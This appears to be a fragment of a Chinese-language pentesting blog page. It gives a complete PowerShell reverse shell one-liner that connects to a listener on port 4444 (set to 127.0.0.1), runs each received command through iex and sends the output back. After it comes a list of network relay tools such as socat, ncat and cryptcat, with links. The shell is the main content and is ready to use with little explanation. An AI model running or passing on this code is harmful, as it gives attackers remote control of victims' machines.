powershell

$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

其他工具

  • socat

https://www.cyberciti.biz/faq/linux-unix-tcp-port-forwarding/

  • NCAT

https://nmap.org/ncat/

  • gnuwin-netcat

http://www.daemon.de/Netcat

  • CryptCat

http://cryptcat.sourceforge.net/

相关文章:

  • 2021-09-23
  • 2021-11-12
  • 2022-12-23
  • 2021-09-14
  • 2021-10-03
  • 2021-07-02
  • 2021-08-18
  • 2021-05-21
猜你喜欢
  • 2022-03-02
  • 2021-10-08
  • 2021-08-14
  • 2021-08-17
  • 2022-12-23
  • 2021-07-14
  • 2021-09-29
相关资源
相似解决方案